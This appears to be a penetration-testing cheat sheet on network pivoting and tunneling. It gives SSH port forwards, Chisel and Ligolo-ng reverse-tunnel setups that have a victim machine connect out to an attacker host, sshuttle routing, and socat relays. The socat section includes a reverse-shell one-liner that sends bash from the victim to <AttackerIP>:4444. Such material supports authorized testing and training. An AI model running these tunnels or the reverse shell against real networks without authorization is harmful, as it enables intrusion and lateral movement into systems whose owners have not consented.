Network Pivoting & Tunneling

1. Visualizing the Pivot

Local Port Forward: Access a specific port on a target (Attacker -> Target:80).
Remote Port Forward: Expose a local port to the target (Target -> Attacker:4444).
Dynamic Port Forward: SOCKS proxy to access any port on the target network.

2. SSH Tunneling (The Classic)

No external tools required, just SSH.

Local Forward (-L)

"I want to access the internal webserver on 10.10.10.5:80, via the jumpbox."

BASH

                            ssh -L 8000:10.10.10.5:80 user@jumpbox
# Access via http://localhost:8000
                        

Remote Forward (-R)

"I want the target to connect back to my listener on port 4444."

BASH

                            ssh -R 4444:127.0.0.1:4444 user@jumpbox
# On target: nc 127.0.0.1 4444 -> connects to your machine
                        

Dynamic Forward (-D)

"I want to scan the whole internal network."

BASH

                            ssh -D 9050 user@jumpbox
# Edit /etc/proxychains4.conf -> socks4 127.0.0.1 9050
proxychains nmap -sT -Pn 10.10.10.5
                        

3. Chisel (The HTTP Tunnel)

Great for getting through firewalls that only allow HTTP/HTTPS.

Server (Attacker)

BASH

                            # Start server on port 8000, allow reverse tunnels
./chisel server -p 8000 --reverse
                        

Client (Victim)

BASH

                            # Connect back to attacker
./chisel client <AttackerIP>:8000 R:socks
                        

This creates a SOCKS proxy on the Attacker machine (default 1080).
Use with Proxychains (socks5 127.0.0.1 1080).

4. Ligolo-ng (The Modern Way)

Uses TUN interfaces for true VPN-like pivoting (better than SOCKS).

Setup (Attacker)

Create Interface:

                        BASH
                        
                            sudo ip tuntap add user <username> mode tun ligolo
sudo ip link set ligolo up

Start Proxy:
BASH
```
./proxy -selfcert
```

Setup (Victim)

Connect Agent:

BASH

./agent -connect <AttackerIP>:11601 -ignore-cert

Routing (Attacker)

Select session in proxy.

Add Route:

                        BASH
                        
                            # Inside proxy console
session 1
# On host terminal
sudo ip route add 10.10.10.0/24 dev ligolo

Now you can ping, nmap (SYN scan works!), and access ports directly without proxychains.

5. SSHuttle (The Lazy VPN)

Linux-only. Doesn't require root on victim, just Python.

BASH

                            # Route all traffic to 10.10.10.0/24 through jumpbox
sshuttle -r user@jumpbox 10.10.10.0/24
                        

Pro: No setup on victim.
Con: TCP only (no UDP/ICMP).

6. Socat (The Pipe)

Binary-to-binary or Port-to-Port relay.

Forward Local 8080 to Target 80:
BASH
```
socat TCP4-LISTEN:8080,fork TCP4:10.10.10.5:80
```

Upgrade Shell:

                        BASH
                        
                            # Victim
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<AttackerIP>:4444

Network Pivoting & Tunneling

Network Pivoting & Tunneling

1. Visualizing the Pivot

2. SSH Tunneling (The Classic)

Local Forward (-L)

Remote Forward (-R)

Dynamic Forward (-D)

3. Chisel (The HTTP Tunnel)

Server (Attacker)

Client (Victim)

4. Ligolo-ng (The Modern Way)

Setup (Attacker)

Setup (Victim)

Routing (Attacker)

5. SSHuttle (The Lazy VPN)

6. Socat (The Pipe)

On this page